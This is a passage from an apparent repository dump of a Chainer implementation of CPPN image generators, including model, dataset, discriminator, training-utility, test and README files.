sample_z(model_config.z_size), args.frames)\n )\n\n for i in range(0, len(zs), args.batch_size):\n\n begin_idx = i\n end_idx = min(i + args.batch_size, len(zs) - 1)\n print(f\"{begin_idx} -> {end_idx}\")\n\n # make input batch\n x = []\n z = []\n for _z in zs[begin_idx:end_idx]:\n _x, _z = input_data.as_batch(z=_z)\n x.append(_x)\n z.append(_z)\n \n if len(x) == 0:\n break\n \n x = numpy.concatenate(x)\n z = numpy.concatenate(z)\n\n # to device\n xp = model.xp\n x = chainer.Variable(xp.asarray(x))\n z = chainer.Variable(xp.asarray(z))\n\n y = model.forward(x, z)\n y = chainer.cuda.to_cpu(y.data)\n\n # chainer variable [B, 1, W, H], float [0, 1] -> numpy array uint8 [0, 255]\n y = post_process_output(y)\n\n for _y in y:\n images.append(Image.fromarray(_y[0]))\n\n # save as gif\n images[0].save(str(args.out), save_all=True, append_images=images)\n\n\nif __name__ == '__main__':\n interp_movie()\n" }, { "alpha_fraction": 0.5958059430122375, "alphanum_fraction": 0.6011512875556946, "avg_line_length": 29.78481101989746, "blob_id": "31a10523b890ed29a016c9bb38aa29684b4d304b", "content_id": "1934efbbb01f52c92627ad0d6d9fac183e38a284", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2432, "license_type": "no_license", "max_line_length": 116, "num_lines": 79, "path": "/cppn/trainer_util.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "import subprocess\nfrom pathlib import Path\n\nimport chainer\nimport numpy\nimport yaml\nfrom PIL import Image\n\nfrom cppn.post_process_output import post_process_output\n\n\ndef sample_generate(generator, save_dir_path, input_data, rows=5, cols=5, seed=0):\n \"\"\" Perform rows*cols images random generation \"\"\"\n @chainer.training.make_extension()\n def make_image(trainer):\n numpy.random.seed(seed)\n xp = generator.xp\n\n N = rows * cols # number of images\n\n # make x and z\n x, z = [], []\n for _ in range(N):\n _x, _z = input_data.as_batch()\n x.append(_x)\n 
z.append(_z)\n\n x = numpy.concatenate(x)\n z = numpy.concatenate(z)\n\n x = chainer.Variable(xp.asarray(x))\n z = chainer.Variable(xp.asarray(z))\n\n with chainer.using_config('train', False), chainer.using_config('enable_backprop', False):\n x = generator.forward(x, z)\n\n x = chainer.cuda.to_cpu(x.data)\n numpy.random.seed()\n\n # float -> uint8\n x = post_process_output(x)\n\n x = x.reshape((rows, cols, 1, input_data.height, input_data.width))\n x = x.transpose((0, 3, 1, 4, 2))\n x = x.reshape(\n (rows * input_data.height, cols * input_data.width)) # output is gray scale so that image array is 2dim\n\n preview_dir = save_dir_path / 'preview'\n preview_dir.mkdir(exist_ok=True, parents=False)\n\n save_path = preview_dir / 'image{:0>8}.png'.format(trainer.updater.iteration)\n Image.fromarray(x).save(save_path)\n\n return make_image\n\n\ndef snap_exec_info(log_dir_path, argparse_args):\n \"\"\" Save execution info to log_dir_path \"\"\"\n\n # commandline args\n def process_val(val):\n if isinstance(val, Path):\n return str(val)\n else:\n return val\n\n argparse_args = {key: process_val(val) for key, val in vars(argparse_args).items()}\n with open(log_dir_path / 'args.yaml', 'w') as f:\n yaml.dump(argparse_args, f)\n\n # git status\n def save_cmd_output(save_path, cmd):\n with open(save_path, 'wb') as f:\n f.write(subprocess.check_output(cmd.split()))\n\n save_cmd_output(log_dir_path / \"git-head.txt\", \"git rev-parse HEAD\")\n save_cmd_output(log_dir_path / \"git-status.txt\", \"git status\")\n save_cmd_output(log_dir_path / \"git-log.txt\", \"git log\")\n save_cmd_output(log_dir_path / \"git-diff.txt\", \"git diff\")\n" }, { "alpha_fraction": 0.5557447075843811, "alphanum_fraction": 0.5821276307106018, "avg_line_length": 32.599998474121094, "blob_id": "40e8371f282440acc1be278c06e5d6eac5b20f1f", "content_id": "eab5b228d199a7046edc33cdbbc10fe874f3b29d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1175, 
"license_type": "no_license", "max_line_length": 95, "num_lines": 35, "path": "/cppn/emnist_dataset.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "import chainer\nimport numpy\nfrom PIL import Image\nimport gzip\nfrom pathlib import Path\nfrom cppn.input_data import InputData\n\n\nclass EMnistDataset(chainer.dataset.DatasetMixin):\n def __init__(self, width: int, height: int, z_size: int, data_path: Path):\n self.width = width\n self.height = height\n self.z_size = z_size\n self.input_data = InputData(self.width, self.height, self.z_size)\n\n # load image data\n with gzip.open(data_path, 'rb') as f:\n self.data = numpy.frombuffer(f.read(), numpy.uint8, offset=16).reshape(-1, 28 * 28)\n\n super(EMnistDataset, self).__init__()\n\n def __len__(self):\n return len(self.data)\n\n def get_example(self, i: int):\n \"\"\" Return batch of image [1, 1, S, S], where S = `size` \"\"\"\n x, z = self.input_data.as_batch()\n \n c = self.data[i] # [0, 255]\n c = c * -1 + 255 # flip\n c = c.reshape((28, 28)).T\n image = Image.fromarray(c).resize((self.width, self.height)) \n c = numpy.asarray(image).astype(numpy.float32) / 255.0 # 2D array\n c = c.reshape((1, 1, self.width, self.height))\n return x, z, c" }, { "alpha_fraction": 0.6793892979621887, "alphanum_fraction": 0.6851145029067993, "avg_line_length": 13.971428871154785, "blob_id": "3ecec2512a6f61e132c4d37a0d4291732a2cba9d", "content_id": "317d3e3f3cbe17c6dc01f7dfbc82d8eb656391f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 524, "license_type": "no_license", "max_line_length": 86, "num_lines": 35, "path": "/README.md", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "## CPPN\n\nImplementation of CPPN using Chainer\n\n### Dependencies\n\nSee `requirements.txt`\n\n### How to init\n\n```bash\ngit submodule init\ngit submodule update\npip install -r requirements.txt\n```\n\nFor gpu support, install 
[CuPy](https://docs-cupy.chainer.org/en/latest/install.html).\n\n### How to test\n\n```\nPYTHONPATH=. pytest test\n```\n\n### Format code for commit\n\n```bash\nautoflake --in-place --remove-all-unused-imports `foo.py`\nisort -y `foo.py`\nyapf --in-place --style='{column_limit: 120}' `foo.py`\n```\n\n### Basic usage\n\nTBD\n" }, { "alpha_fraction": 0.557209312915802, "alphanum_fraction": 0.5823255777359009, "avg_line_length": 33.709678649902344, "blob_id": "07def4448d6a38064b3bd7ac94099e9c433d1fed", "content_id": "400b9a42698e8ac62e233203568c3fbaa0431812", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1075, "license_type": "no_license", "max_line_length": 88, "num_lines": 31, "path": "/cppn/mnist_dataset.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "import chainer\nimport numpy\nfrom PIL import Image\nfrom cppn.input_data import InputData\n\n\nclass MnistDataset(chainer.dataset.DatasetMixin):\n def __init__(self, width: int, height: int, z_size: int):\n self.width = width\n self.height = height\n self.z_size = z_size\n self.input_data = InputData(self.width, self.height, self.z_size)\n\n # use only train dataset\n self.train_data, _ = chainer.datasets.get_mnist()\n super(MnistDataset, self).__init__()\n \n def __len__(self):\n return len(self.train_data)\n\n def get_example(self, i: int):\n \"\"\" Return batch of image [1, 1, S, S], where S = `size` \"\"\"\n x, z = self.input_data.as_batch()\n\n c, _ = self.train_data[i]\n c = c * -1 + 1.0 # flip [0, 1] -> [1, 0]\n c = c.reshape((28, 28)) * 255.0\n image = Image.fromarray(c.astype(numpy.uint8)).resize((self.width, self.height))\n c = numpy.asarray(image).astype(numpy.float32) / 255.0 # 2D array\n c = c.reshape((1, 1, self.width, self.height))\n return x, z, c" }, { "alpha_fraction": 0.7226890921592712, "alphanum_fraction": 0.7226890921592712, "avg_line_length": 26.461538314819336, "blob_id": "f38ac9087a923e37244b89ee180c05aa229ea380", 
"content_id": "d94a1fdb7b518e5c2110293caa7e1dc37863f736", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 357, "license_type": "no_license", "max_line_length": 102, "num_lines": 13, "path": "/cppn/init_logger.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "import logging\n\nimport colorlog\n\n\ndef init_logger(name):\n logger = logging.getLogger(name)\n handler = colorlog.StreamHandler()\n handler.setFormatter(colorlog.ColoredFormatter('%(log_color)s%(levelname)s:%(name)s:%(message)s'))\n logger = colorlog.getLogger('example')\n logger.addHandler(handler)\n logger.propagate = False\n return logger\n" }, { "alpha_fraction": 0.5922746658325195, "alphanum_fraction": 0.6437768340110779, "avg_line_length": 22.299999237060547, "blob_id": "c50547e879b57a25423e7cf0d745ec73f38831e9", "content_id": "742f6df34bbd540225d06fd91af8bc2a5b63f273", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 233, "license_type": "no_license", "max_line_length": 64, "num_lines": 10, "path": "/cppn/post_process_output.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "import chainer\nimport numpy\n\n\ndef post_process_output(x):\n \"\"\" convert output of CPPN -> uint8 array \"\"\"\n if isinstance(x, chainer.Variable):\n x = x.data\n\n return numpy.clip(x * 255.0, 0.0, 255.0).astype(numpy.uint8)\n" }, { "alpha_fraction": 0.6300856471061707, "alphanum_fraction": 0.6418629288673401, "avg_line_length": 28.203125, "blob_id": "fbea175365795d3cfa1054aa37fef4bec7dc2337", "content_id": "7315c0ef80bd628b77ddebae5b62f62361c2e601", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1868, "license_type": "no_license", "max_line_length": 124, "num_lines": 64, "path": "/experiments/show_samples_from_dataset.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "# import CPPN modules\nimport sys # 
isort:skip\nimport os # isort:skip\nsys.path.append(os.getcwd()) # isort:skip\n\nimport numpy\nimport argparse\nfrom pathlib import Path\nimport random\nfrom PIL import Image\nfrom cppn.mnist_dataset import MnistDataset\nfrom cppn.emnist_dataset import EMnistDataset\n\n\ndef show_samples_from_dataset(\n dataset_type: str,\n n_rows: int,\n n_cols: int,\n size: int,\n data_path: Path,\n output_path: Path):\n \n # initialize dataset\n if dataset_type == 'mnist':\n dataset = MnistDataset(width=size, height=size, z_size=1)\n elif dataset_type == 'emnist':\n dataset = EMnistDataset(width=size, height=size, z_size=1, data_path=data_path)\n else:\n raise NotImplementedError\n\n # sample images\n rows = []\n for i in range(n_rows):\n rows.append(\n numpy.concatenate([ dataset.get_example(random.randint(0, len(dataset) - 1))[2] for _ in range(n_cols)], axis=3)\n )\n img = numpy.concatenate(rows, axis=2)\n \n # float32 -> uint8\n img = (img[0, 0] * 255.0).astype(numpy.uint8)\n\n Image.fromarray(img).save(output_path)\n \n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('output_path', type=Path)\n parser.add_argument('--dataset_type', type=str, choices=('mnist', 'emnist'), default='mnist')\n parser.add_argument('--data_path', type=Path)\n parser.add_argument('--n_rows', type=int, default=5)\n parser.add_argument('--n_cols', type=int, default=5)\n parser.add_argument('--size', type=int, default=128)\n args = parser.parse_args()\n\n assert args.output_path.parent.exists()\n\n show_samples_from_dataset(\n dataset_type=args.dataset_type,\n n_rows=args.n_rows,\n n_cols=args.n_cols,\n size=args.size,\n data_path=args.data_path,\n output_path=args.output_path\n )" }, { "alpha_fraction": 0.4720812141895294, "alphanum_fraction": 0.6802030205726624, "avg_line_length": 14.760000228881836, "blob_id": "3327c00c8760840521eaac765beed7880a0d84e2", "content_id": "c78dddd1d9a17caf3f0190463d8181ccec4e1abf", "detected_licenses": [], "is_generated": false, 
"is_vendor": false, "language": "Text", "length_bytes": 394, "license_type": "no_license", "max_line_length": 24, "num_lines": 25, "path": "/requirements.txt", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "atomicwrites==1.3.0\nattrs==19.2.0\nautoflake==1.3.1\nchainer==6.4.0\nfilelock==3.0.12\nimportlib-metadata==0.23\nisort==4.3.21\nmore-itertools==7.2.0\nnumpy==1.17.2\npackaging==19.2\nPillow==6.2.0\npluggy==0.13.0\nprotobuf==3.7.1\npy==1.8.0\npyflakes==2.1.1\npyparsing==2.4.2\npytest==5.2.1\nPyYAML==5.1.2\nscipy==1.3.1\nsix==1.12.0\ntyping==3.6.6\ntyping-extensions==3.6.6\nwcwidth==0.1.7\nyapf==0.28.0\nzipp==0.6.0\n" }, { "alpha_fraction": 0.5839464664459229, "alphanum_fraction": 0.5892976522445679, "avg_line_length": 29.510204315185547, "blob_id": "ec7ee8238640d6711457094d72896d7b6e6fd446", "content_id": "3441c7d5dd930dcde85329357fcdbd8b1d7b61c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1495, "license_type": "no_license", "max_line_length": 105, "num_lines": 49, "path": "/experiments/sample_image_from_paths.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "from pathlib import Path\nimport argparse\nimport numpy\nfrom PIL import Image\n\ndef sample_image_from_paths(target_path: Path, out_path: Path, n_cols: int, n_rows: int, size: int = 64):\n \"\"\" Plot n_rows * n_cols images from target_path \"\"\"\n imgs = []\n with open(target_path) as f:\n line = f.readline()\n while line:\n target = line.split('\\n')[0]\n target = Path(target)\n\n img = Image.open(target)\n img = img.resize((size, size))\n img = img.convert('L')\n img = numpy.asarray(img)\n\n imgs.append(img)\n\n if len(imgs) >= n_cols * n_rows: break\n line = f.readline() # next line\n \n # imgs is list of (size, size) uint8 array\n rows = []\n for i in range(n_rows):\n row = numpy.concatenate([ imgs[n_cols * i + j] for j in range(n_cols)], axis=1)\n rows.append(row)\n\n imgs = numpy.concatenate(rows, 
axis=0)\n Image.fromarray(imgs).save(out_path)\n \n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('target_path', type=Path)\n parser.add_argument('out_path', type=Path)\n parser.add_argument('--n_cols', type=int, default=5)\n parser.add_argument('--n_rows', type=int, default=5)\n args = parser.parse_args()\n\n\n # check arguments\n assert args.target_path.exists()\n assert args.out_path.parent.exists()\n\n sample_image_from_paths(args.target_path, args.out_path, args.n_cols, args.n_rows)\n" }, { "alpha_fraction": 0.5786193609237671, "alphanum_fraction": 0.5872483253479004, "avg_line_length": 33.196720123291016, "blob_id": "c3355774699946c065c80f55ae1a5e2b1a8931b5", "content_id": "568d0596f3514cb3ed291552f56c20b5da10b591", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2086, "license_type": "no_license", "max_line_length": 118, "num_lines": 61, "path": "/cppn/model.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "import dataclasses\nimport typing\n\nimport chainer\nimport chainer.functions as F\nimport chainer.links as L\n\nfrom cppn import config_base\n\n\[email protected]\nclass ModelConfig(config_base.ConfigBase):\n width: int\n height: int\n n_units_xyrz: int\n n_hidden_units: typing.List[int]\n z_size: int\n activation: typing.Callable = F.tanh\n\n\nclass CPPN(chainer.Chain):\n def __init__(self, config: ModelConfig):\n self.config = config\n super(CPPN, self).__init__()\n\n initialW = chainer.initializers.Normal(scale=1.0)\n\n with self.init_scope():\n self.l_x = L.Linear(1, self.config.n_units_xyrz, initialW=initialW)\n self.l_y = L.Linear(1, self.config.n_units_xyrz, initialW=initialW)\n self.l_r = L.Linear(1, self.config.n_units_xyrz, initialW=initialW)\n self.l_z = L.Linear(self.config.z_size, self.config.n_units_xyrz, initialW=initialW)\n\n input_size = self.config.n_units_xyrz\n for i, n_hidden_unit in 
enumerate(self.config.n_hidden_units):\n setattr(self, f\"l_hidden_{i}\", L.Linear(input_size, n_hidden_unit, initialW=initialW))\n input_size = n_hidden_unit\n self.l_out = L.Linear(self.config.n_hidden_units[-1], 1, initialW=initialW)\n\n def forward(self, x, z):\n assert x.shape[0] % (self.config.width *\n self.config.height) == 0, f\"Invalid input size x.shape[0] % (width * height) != 0\"\n\n batch_size = x.shape[0] // (self.config.width * self.config.height)\n\n f = self.config.activation\n _x, _y, _r = F.split_axis(x, 3, axis=1)\n h = self.l_x(_x)\n h += self.l_y(_y)\n h += self.l_r(_r)\n h += self.l_z(z)\n h = F.softplus(h)\n\n for i in range(len(self.config.n_hidden_units)):\n h = f(getattr(self, f\"l_hidden_{i}\")(h))\n\n h = F.sigmoid(self.l_out(h))\n h = F.concat(\n [_h.reshape((1, 1, self.config.width, self.config.height)) for _h in F.split_axis(h, batch_size, axis=0)],\n axis=0)\n return h\n" }, { "alpha_fraction": 0.5441714525222778, "alphanum_fraction": 0.565342366695404, "avg_line_length": 33.16071319580078, "blob_id": "13e3bd24ff778be92b835509d4a15fcc73995c66", "content_id": "13bc1a82b223262c8884bc508448a1d4b642990b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3826, "license_type": "no_license", "max_line_length": 111, "num_lines": 112, "path": "/test/test_backward.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "import chainer\nimport chainer.functions as F\nimport numpy\n\nfrom cppn.conditional_model import ConditionalCPPN, ConditionalModelConfig\nfrom cppn.input_data import InputData\nfrom cppn.model import CPPN, ModelConfig\n\n\ndef get_dammy_input(batch, width, height, channel):\n x = numpy.random.rand(batch, channel, width, height) # [0, 1]\n x *= 255\n return x.astype(numpy.float32)\n\n\ndef get_dammy_output(batch, width, height):\n x = numpy.random.rand(batch, 1, width, height) # [0, 1]\n x *= 255\n return x.astype(numpy.float32)\n\n\ndef 
gen_input_batch(batch_size, width, height, z_size):\n # create inputs\n inputs = {}\n x, z = [], []\n for idx in range(batch_size):\n _x, _z = InputData(width=width, height=height, z_size=z_size).as_batch()\n _x = chainer.Variable(_x)\n _z = chainer.Variable(_z)\n x.append(_x)\n z.append(_z)\n inputs[idx] = (_x, _z)\n x = F.concat(x, axis=0)\n z = F.concat(z, axis=0)\n return x, z, inputs\n\n\ndef test_unconditional_forward():\n \"\"\" checking gradient leaking along batch axis \"\"\"\n width = 5\n height = 7\n z_size = 2\n batch_size = 3\n\n model = CPPN(ModelConfig(width=width, height=height, n_units_xyrz=3, n_hidden_units=[5, 5], z_size=z_size))\n model.zerograds()\n\n # create inputs: inputs is dict whose key is batch index, and value is tuple of (x, z) for each index\n x, z, inputs = gen_input_batch(batch_size, width, height, z_size)\n\n # forward prop\n y = model.forward(x, z)\n\n # taking loss at only first image\n t = get_dammy_output(batch_size, width, height)\n loss = F.mean_squared_error(y[0], t[0])\n\n # check gradient leaking\n assert sum([g.data.sum() for g in chainer.grad((loss, ), inputs[0])]) != 0.0\n assert sum([g.data.sum() for g in chainer.grad((loss, ), inputs[1])]) == 0.0\n assert sum([g.data.sum() for g in chainer.grad((loss, ), inputs[2])]) == 0.0\n\n\ndef test_conditional_backward():\n \"\"\" checking gradient leaking along batch axis \"\"\"\n width = 5\n height = 7\n z_size = 2\n batch_size = 3\n\n model = ConditionalCPPN(\n ConditionalModelConfig(width=width,\n height=height,\n n_units_xyr=3,\n n_hidden_units=[\n 10,\n 10,\n ],\n z_size=z_size,\n in_width=64,\n in_height=64,\n in_channel=1,\n use_batch_norm=False))\n model.zerograds()\n\n # create inputs: inputs is dict whose key is batch index, and value is tuple of (x, z) for each index\n x, z, inputs = gen_input_batch(batch_size, width, height, z_size)\n c = chainer.Variable(get_dammy_input(batch_size, 64, 64, 1)) # init dammy conditional input\n\n # forward prop\n y = model.forward(x, 
z, c)\n\n # taking loss at only first image\n t = get_dammy_output(batch_size, width, height)\n loss = F.mean_squared_error(y[0], t[0])\n\n g_x, g_z = chainer.grad((loss, ), inputs[0])\n g_c = chainer.grad((loss, ), (c, ))[0].data\n\n assert g_c[0].sum() != 0.0, f\"gradient of c is zero\"\n assert g_x.data.sum() != 0.0, f\"gradient of x is zero\"\n assert g_z.data.sum() != 0.0, f\"gradient of z is zero\"\n\n g_x, g_z = chainer.grad((loss, ), inputs[1])\n assert g_c[1].sum() == 0.0, f\"gradient of c is zero\"\n assert g_x.data.sum() == 0.0, f\"gradient of x is zero\"\n assert g_z.data.sum() == 0.0, f\"gradient of z is zero\"\n\n g_x, g_z = chainer.grad((loss, ), inputs[2])\n assert g_c[2].sum() == 0.0, f\"gradient of c is zero\"\n assert g_x.data.sum() == 0.0, f\"gradient of x is zero\"\n assert g_z.data.sum() == 0.0, f\"gradient of z is zero\"\n" }, { "alpha_fraction": 0.5718799233436584, "alphanum_fraction": 0.5831640958786011, "avg_line_length": 36.235294342041016, "blob_id": "2ddedfae78d8bc80e19f45f34668ca15dd5baa8c", "content_id": "512c5c8a828d5cdd5b9edac0cf3d8a2b62104113", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4431, "license_type": "no_license", "max_line_length": 120, "num_lines": 119, "path": "/cppn/conditional_model.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "import dataclasses\nimport typing\n\nimport chainer\nimport chainer.functions as F\nimport chainer.links as L\n\nfrom cppn import config_base\n\n\[email protected]\nclass ConditionalModelConfig(config_base.ConfigBase):\n width: int\n height: int\n n_units_xyr: int\n n_hidden_units: typing.List[int]\n z_size: int\n in_width: int = 64 # width of conditional input\n in_height: int = 64 # height of conditional input\n in_channel: int = 1 # channel of conditional input\n activation: typing.Callable = F.tanh\n use_batch_norm: bool = True # using batch normalization layer or not\n\n\nclass Block(chainer.Chain):\n def 
__init__(self, in_channel, out_channel, ksize, activation, use_batch_norm):\n self.activation = activation\n self.use_batch_norm = use_batch_norm\n super(Block, self).__init__()\n with self.init_scope():\n self.conv = L.Convolution2D(in_channel, out_channel, ksize=ksize, stride=2)\n if use_batch_norm:\n self.norm = L.BatchNormalization(out_channel)\n\n def __call__(self, x):\n h = self.conv(x)\n if self.use_batch_norm: h = self.norm(h)\n return self.activation(h)\n\n\nclass ConditionInputProcessor(chainer.Chain):\n \"\"\" Conditional input processing part of CPPN model \"\"\"\n def __init__(self, width, height, channel, activation, use_batch_norm):\n self.width = width\n self.height = height\n self.channel = channel\n super(ConditionInputProcessor, self).__init__()\n\n with self.init_scope():\n in_channel = channel\n for i, out_channel, ksize in zip(range(3), (12, 32, 64, 64), (6, 3, 3, 2)):\n setattr(self, f\"block_{i}\",\n Block(in_channel, out_channel, ksize, activation, use_batch_norm=use_batch_norm))\n in_channel = out_channel\n\n def __call__(self, x):\n batch_size = x.shape[0]\n h = x\n for i in range(3):\n block = getattr(self, f\"block_{i}\")\n h = block(h)\n h = F.average_pooling_2d(h, ksize=4, stride=2)\n return F.reshape(h, (batch_size, -1)) # reshape into vector\n\n\nclass ConditionalCPPN(chainer.Chain):\n \"\"\" conditional generator of CPPN \"\"\"\n def __init__(self, config: ConditionalModelConfig):\n self.config = config\n super(ConditionalCPPN, self).__init__()\n\n initialW = chainer.initializers.Normal(scale=1.0)\n\n with self.init_scope():\n self.l_x = L.Linear(1, self.config.n_units_xyr, initialW=initialW)\n self.l_y = L.Linear(1, self.config.n_units_xyr, initialW=initialW)\n self.l_r = L.Linear(1, self.config.n_units_xyr, initialW=initialW)\n self.l_z = L.Linear(self.config.z_size, self.config.n_units_xyr, initialW=initialW)\n self.l_c = ConditionInputProcessor(self.config.in_width, self.config.in_height, self.config.in_channel,\n 
self.config.activation, self.config.use_batch_norm)\n\n for i, n_hidden_unit in enumerate(self.config.n_hidden_units):\n setattr(self, f\"l_hidden_{i}\", L.Linear(None, n_hidden_unit, initialW=initialW))\n self.l_out = L.Linear(None, 1, initialW=initialW)\n\n def forward(self, x, z, c):\n assert x.shape[0] % (self.config.width *\n self.config.height) == 0, f\"Invalid input size x.shape[0] % (width * height) != 0\"\n\n batch_size = x.shape[0] // (self.config.width * self.config.height)\n\n # processing conditional input\n h_c = self.l_c(c) # [B, 256]\n h_c = [\n F.repeat(_h, self.config.width * self.config.height, axis=0) for _h in F.split_axis(h_c, batch_size, axis=0)\n ]\n h_c = F.concat(h_c, axis=0)\n\n # process input\n f = self.config.activation\n _x, _y, _r = F.split_axis(x, 3, axis=1)\n h_in = self.l_x(_x)\n h_in += self.l_y(_y)\n h_in += self.l_r(_r)\n h_in += self.l_z(z)\n h_in = f(h_in)\n\n # concat with conditional feature\n h = F.concat((h_in, h_c), axis=1)\n\n for i in range(len(self.config.n_hidden_units)):\n h = f(getattr(self, f\"l_hidden_{i}\")(h))\n\n h = F.sigmoid(self.l_out(h))\n\n h = F.concat(\n [_h.reshape((1, 1, self.config.width, self.config.height)) for _h in F.split_axis(h, batch_size, axis=0)],\n axis=0)\n return h\n" }, { "alpha_fraction": 0.49644550681114197, "alphanum_fraction": 0.5165876746177673, "avg_line_length": 45.88888931274414, "blob_id": "003619cbbecd28325992a3432ab14a953ff75c00", "content_id": "933062de3e564d793b18db80c4854f92801b7567", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 844, "license_type": "no_license", "max_line_length": 117, "num_lines": 18, "path": "/test/test_train.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "import tempfile\nfrom pathlib import Path\n\nfrom cppn.model import ModelConfig\nfrom experiments import train\n\n\ndef test_train():\n with tempfile.TemporaryDirectory() as tmp_dir:\n train_config = 
train.TrainConfig(train_image_dir_path=(Path(__file__).parent / 'dammy_image_data').resolve(),\n max_iter=2,\n batch_size=5,\n snapshot_iter_interval=2,\n display_iter_interval=1,\n n_discriminator_update=3,\n evaluation_iter_interval=1)\n model_config = ModelConfig(width=64, height=64, n_units_xyrz=10, n_hidden_units=[10, 10], z_size=2)\n train.train(Path(tmp_dir), train_config, model_config)\n" }, { "alpha_fraction": 0.5421398878097534, "alphanum_fraction": 0.589958131313324, "avg_line_length": 41.89743423461914, "blob_id": "1f222578e450e98ce0b52e78d4e647c1379d8ec6", "content_id": "a005fe3f0edc730249eaa3c2045fbdeb7d4795ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1673, "license_type": "no_license", "max_line_length": 80, "num_lines": 39, "path": "/cppn/sn_discriminator.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "# import chainer gan lib\nimport sys # isort:skip\nfrom pathlib import Path # isort:skip\nCHAINER_GAN_LIB = Path(__file__).parent.parent / 'chainer-gan-lib' # isort:skip\nsys.path.append(str(CHAINER_GAN_LIB)) # isort:skip\nsys.path.append(str(CHAINER_GAN_LIB / 'sn')) # isort:skip\nsys.path.append(str(CHAINER_GAN_LIB / 'common')) # isort:skip\n\nimport chainer\nimport chainer.functions as F\n\nfrom sn.sn_convolution_2d import SNConvolution2D\nfrom sn.sn_linear import SNLinear\n\n\nclass SNDiscriminator(chainer.Chain):\n def __init__(self, wscale=0.02, ch=24):\n w = chainer.initializers.Normal(wscale)\n super(SNDiscriminator, self).__init__()\n with self.init_scope():\n # in_channels, out_channels, ksize, stride, pad\n self.c0_0 = SNConvolution2D(1, ch // 8, 3, 1, 1, initialW=w)\n self.c0_1 = SNConvolution2D(ch // 8, ch // 4, 4, 2, 1, initialW=w)\n self.c1_0 = SNConvolution2D(ch // 4, ch // 4, 3, 1, 1, initialW=w)\n self.c1_1 = SNConvolution2D(ch // 4, ch // 2, 4, 2, 1, initialW=w)\n self.c2_0 = SNConvolution2D(ch // 2, ch // 2, 3, 1, 1, initialW=w)\n self.c2_1 = 
SNConvolution2D(ch // 2, ch // 1, 4, 2, 1, initialW=w)\n self.c3_0 = SNConvolution2D(ch // 1, ch // 1, 3, 1, 1, initialW=w)\n self.l_4 = SNLinear(None, 1, initialW=w)\n\n def forward(self, x):\n h = F.leaky_relu(self.c0_0(x))\n h = F.leaky_relu(self.c0_1(h))\n h = F.leaky_relu(self.c1_0(h))\n h = F.leaky_relu(self.c1_1(h))\n h = F.leaky_relu(self.c2_0(h))\n h = F.leaky_relu(self.c2_1(h))\n h = F.leaky_relu(self.c3_0(h))\n return self.l_4(h)\n" }, { "alpha_fraction": 0.5518292784690857, "alphanum_fraction": 0.5691056847572327, "avg_line_length": 27.941177368164062, "blob_id": "440ad4c1297e3711b469ad0f2effd0535c6c0b56", "content_id": "9c9e73f818c523556d8be875c80c935451dd4faf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 984, "license_type": "no_license", "max_line_length": 78, "num_lines": 34, "path": "/cppn/my_dataset.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "from pathlib import Path\nimport chainer\nimport numpy\nfrom PIL import Image\n\nfrom cppn.input_data import InputData\n\n\nclass MyDataset(chainer.dataset.DatasetMixin):\n def __init__(self, paths: list, width: int, height: int, z_size: int):\n self.paths = paths\n self.width = width\n self.height = height\n self.z_size = z_size\n self.input_data = InputData(self.width, self.height, self.z_size)\n super(MyDataset, self).__init__()\n\n def __len__(self):\n return len(self.paths)\n\n def get_example(self, i):\n \"\"\" returns x, z, c \"\"\"\n # get\n x, z = self.input_data.as_batch()\n\n # open image and convert to [1, 1, W, H]\n c = Image.open(Path(self.paths[i]))\n c = c.resize((self.width, self.height))\n\n c = c.convert('L')\n c = numpy.asarray(c, dtype=numpy.float32) / 255. 
